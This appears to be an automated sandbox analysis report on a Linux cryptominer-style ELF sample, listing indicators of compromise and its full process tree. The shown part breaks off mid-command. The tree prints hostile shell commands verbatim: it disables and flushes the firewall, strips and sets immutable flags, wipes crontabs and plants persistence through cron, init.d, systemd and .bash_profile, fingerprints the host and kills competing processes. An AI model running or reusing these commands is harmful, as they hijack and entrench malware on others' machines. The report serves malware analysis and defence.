/sys/devices/virtual/dmi/id File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus service-agent File opened for reading /sys/bus/cpu/devices service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/fs/cgroup/unified/cgroup.controllers service-agent File opened for reading /sys/devices/system/node/online service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition service-agent File opened for reading /sys/bus/node/devices/node0/meminfo service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/thread_siblings service-agent File opened for reading /sys/bus/node/devices/node0/hugepages File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size File opened for reading /sys/fs/cgroup/unified/cgroup.controllers service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size service-agent File opened for reading /sys/bus/node/devices/node0/meminfo service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map service-agent -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
systemctlpspspspkillpkillpgreppkillpspkillpspspkillpspspspspspspspspspspkillpsdescription ioc process File opened for reading /proc/1/environ systemctl File opened for reading /proc/30/cmdline ps File opened for reading /proc/199/status ps File opened for reading /proc/89/cmdline ps File opened for reading /proc/1153/cmdline pkill File opened for reading /proc/1470/status pkill File opened for reading /proc/1259/cmdline File opened for reading /proc/10/status File opened for reading /proc/1364/cmdline pgrep File opened for reading /proc/418/status pkill File opened for reading /proc/22/status File opened for reading /proc/161/cmdline ps File opened for reading /proc/973/status pkill File opened for reading /proc/643/status File opened for reading /proc/3/stat ps File opened for reading /proc/1185/status ps File opened for reading /proc/199/cmdline File opened for reading /proc/26/status pkill File opened for reading /proc/1032/status ps File opened for reading /proc/166/stat ps File opened for reading /proc/1575/status ps File opened for reading /proc/1554/status ps File opened for reading /proc/171/cmdline File opened for reading /proc/7/cmdline File opened for reading /proc/1575/cmdline File opened for reading /proc/6/cmdline pgrep File opened for reading /proc/1261/status ps File opened for reading /proc/664/stat ps File opened for reading /proc/1165/status File opened for reading /proc/22/cmdline File opened for reading /proc/10/stat File opened for reading /proc/520/status File opened for reading /proc/1152/status ps File opened for reading /proc/199/stat File opened for reading /proc/27/status File opened for reading /proc/1192/stat ps File opened for reading /proc/166/cmdline File opened for reading /proc/4732/status File opened for reading /proc/1575/cmdline File opened for reading /proc/1046/stat ps File opened for reading /proc/2584/stat ps File opened for reading /proc/22/status pkill File opened for reading /proc/1829/status File opened for reading /proc/454/cmdline pkill File opened for reading /proc/filesystems File opened for reading /proc/1159/status File opened for reading /proc/80/stat ps File opened for reading /proc/1089/status File opened for reading /proc/452/cmdline File opened for reading /proc/595/status ps File opened for reading /proc/664/stat File opened for reading /proc/1075/cmdline File opened for reading /proc/1032/status File opened for reading /proc/859/stat ps File opened for reading /proc/700/status ps File opened for reading /proc/245/cmdline File opened for reading /proc/1032/stat ps File opened for reading /proc/82/stat ps File opened for reading /proc/266/cmdline File opened for reading /proc/4318/status File opened for reading /proc/471/status File opened for reading /proc/36/cmdline pkill File opened for reading /proc/164/stat ps File opened for reading /proc/652/stat ps -
Writes file to shm directory 2 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elfdescription ioc process File opened for modification /dev/shm/.klibsystem5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /dev/shm/.klibsystem5 -
Writes file to tmp directory 34 IoCs
Malware often drops required files in the /tmp directory.
Processes:
shshservice-agentservice-agent2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elfsys-helpersys-helpershsys-helperservice-agentsys-helpersys-helperservice-agentshshservice-agentshsys-helperservice-agentdescription ioc process File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile File opened for modification /tmp/.lock File opened for modification /tmp/.lock service-agent File opened for modification /tmp/~/.bash_profile File opened for modification /tmp/~/.bash_profile File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc File opened for modification /tmp/service-agent 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock File opened for modification /tmp/.bashirc File opened for modification /tmp/sys-helper 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /tmp/service-agent File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock service-agent File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc File opened for modification /tmp/.bashirc File opened for modification /tmp/sys-helper File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock File opened for modification /tmp/~/.bash_profile File opened for modification /tmp/.lock File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock service-agent
Processes
-
/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:1578 -
/bin/bashbash -c "ufw disable"2⤵PID:1582
-
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1582 -
/sbin/iptables/sbin/iptables -V3⤵PID:1586
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1587
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1588
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
PID:1589
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1593
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1596
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1597
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1598
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1599
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1600
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1601
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1602
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1603
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵PID:1604
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1605
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵PID:1606
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1607
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1608
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1609
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1610
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1611
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1612
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1613
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1614
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1615
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1616
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1617
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:1618
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1619
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1620
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1621
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1622
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1623
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1624
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1625
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1626
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1627
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1628
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1629
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1630
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1631
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1632
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1633
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1634
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:1635
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:1636
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1637
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1638
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1639
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1640
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1641
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1642
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1643
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1644
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1645
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1646
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1647
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1648
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1649
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1650
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1651
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1652
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1653
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1654
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1655
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1656
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1657
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1658
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1659
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1660
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1661
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:1662
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1663
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1664
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1665
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1666
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1667
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1668
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1669
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1670
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1671
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1672
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1673
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1674
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1675
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1676
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1677
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1678
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1679
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1680
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1681
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1682
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1683
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:1684
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1685
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1687
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1688
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1689
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1690
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1691
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1692
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1693
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1694
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1695
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1696
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1697
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1698
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1699
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1700
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1701
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1702
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1703
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1704
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1705
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1706
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1707
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1708
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1709
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1710
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1711
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1712
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1713
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1714
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1715
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1716
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1717
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1718
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1719
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1720
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1721
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1722
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1723
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1724
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1725
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1726
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1727
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1728
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1729
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1730
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1731
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1732
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1733
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1734
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1735
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1736
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1737
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1738
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1739
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1740
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1741
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1742
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1743
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1744
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1745
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1746
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1747
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1748
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1749
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1750
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1751
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1752
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1753
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1754
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1755
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1756
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1757
-
-
-
-
/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵PID:1758
-
-
/sbin/iptablesiptables -P INPUT ACCEPT2⤵PID:1758
-
-
/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵PID:1759
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵PID:1759
-
-
/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵PID:1760
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT2⤵PID:1760
-
-
/bin/bashbash -c "iptables -F"2⤵PID:1761
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1761
-
-
/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵PID:1762
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵PID:1762
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵PID:1763
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads runtime system information
PID:1764
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
- Attempts to change immutable files
PID:1765
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
PID:1766 -
/bin/cpcp -f -r -- /bin/knlib5 /bin/klibsystem53⤵PID:1767
-
-
/bin/rmrm -rf -- klibsystem53⤵PID:1769
-
-
/usr/bin/nohupnohup ./klibsystem53⤵PID:1768
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵PID:1770
-
-
/bin/systemctlsystemctl daemon-reload2⤵PID:1771
-
-
/bin/systemctlsystemctl enable knlibe.service2⤵PID:1792
-
-
/usr/bin/chattrchattr +ia /bin/knlib52⤵PID:1813
-
-
/usr/bin/crontabcrontab -r2⤵PID:1814
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:1815
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵PID:1816
-
-
/bin/bashbash -c "echo \"* * * * * /dev/shm/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:1817
-
/usr/bin/crontabcrontab -3⤵PID:1819
-
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:1820
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:1821
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:1822
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
- Attempts to change immutable files
PID:1823
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:1824
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:1825
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
- Attempts to change immutable files
PID:1826
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:1827
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1828
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:1830 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
PID:1831 -
/usr/bin/whoamiwhoami4⤵PID:1842
-
-
/bin/hostnamehostname4⤵PID:1843
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:1844
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:1860
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:1862
-
-
/bin/psps -A "-ostat,ppid"4⤵PID:1861
-
-
/usr/bin/idid -u4⤵PID:1864
-
-
/bin/grepgrep -v grep4⤵PID:1867
-
-
/bin/grepgrep /etc/cron4⤵PID:1866
-
-
/bin/psps x4⤵PID:1865
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > 